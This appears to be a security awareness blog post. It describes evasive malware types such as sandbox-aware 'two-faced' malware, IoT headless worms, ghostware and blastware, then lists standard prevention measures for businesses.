New malware infections are finding smarter ways to cover their tracks.
As such, when a breach occurs, it’s becoming more difficult for businesses and investigators to pinpoint what data has been compromised, how it was stolen, and by who.
Malware coders have also begun to push out programs that can trick, erase, and even destroy systems that detect it as a malware infection.
Below, we review some of these new malware types, including two-faced malware, headless worms, blastware, and ghostware.
Two-faced malware gets its name from how it presents one safe “face” to your anti-virus, but retains its malicious “face” once it is dubbed safe.
This type of malware attack works by recognizing when the computer’s anti-virus isolates the malware into a sandbox.
A sandbox is a designated “safe zone” used to test/check questionable programs before they are given access to a computers’ drive and/or network.
Two-faced malware senses when it has been placed in a sandbox and escapes detection by ceasing all malicious activity while isolated.
In doing this, the malware tricks the anti-virus into flagging said program as safe, and it is released back onto the computer.
Once this type of malware has deceived the sandbox’s protocols, it can be too late for many security systems to recognize it as malicious because it has already been flagged as safe.
An updated strand of the Locky ransomware has shown detection-evasion tendencies similar to two-faced malware.
This new version of Locky uses a mathematical calculation to determine whether or not it is in a sandbox testing area.
Headless worms are an anticipated type of malware attack that targets “headless devices”, or gadgets that run on their own without having to be directed by a user.
Think of smart appliances, mobile trackers, and other devices in the ever-growing Internet of Things.
IoT devices are notorious for freely connecting to the internet with little security. This makes them susceptible to compromise by malware that seeks to add them to a botnet.
A botnet is a zombie network of machines infected with malware that allows an attacker to control them without the owners’ knowledge. They are often used to power DDoS attacks.
A headless worm could allow attackers to grow a botnet more efficiently, enabling them to launch even larger attacks, such as the massive one that recently targeted Dyn servers.
While a large-scale headless worm has yet to be discovered in the wild, attendees at the Black Hat Asia conference in May proved the concept. It’s only a matter of time before criminals put the idea to use.
Ghostware conceals its tracks by erasing all traces of its activity once a system is breached.
This type of malware makes it especially difficult to figure out what has been compromised during a breach.
It also makes it hard for network security specialists to fix the weaknesses that lead to the successful attack since this type of malware doesn’t leave a trail that indicates its point of entry.
Ghostware appears to be a more sophisticated version of rootkit malware, which simply hides its existence instead of completely erasing any indication of its presence.
Blastware, while not very subtle, is very difficult to analyze after an attack. That’s because it earns its name by obliterating the servers that flag it as malware.
When researchers attempted to further inspect the code, the malware proceeded to erase both traces of its activity and all information kept on the hard drive.
Such attacks can destroy crucial infrastructure in the network.
This also makes it incredibly difficult for investigators to find the culprit because any trace of the malware and the infected system are destroyed.
As you can see, all of these types of malware attacks are nasty and difficult to detect, so preventing them is an ideal approach.
Good ways to prevent these types of attacks from hurting your clients:
- Implement sound security policies and consistently follow and enforce them. Continually update them to address evolving threats and needs.
- Educate employees to be cautious when opening emails or attachments from an unknown source.
- Segment the network on a need-to-access basis. Give users access only to systems needed to perform their jobs. Do not grant network-wide access to all users on the network.
- Prevent unauthorized devices from connecting to the network.
- Maintain a firewall on the network perimeter and on all computers and devices.
- Maintain an antivirus solution and keep it patched.
- Regularly patch and update all systems, and train employees to do the same.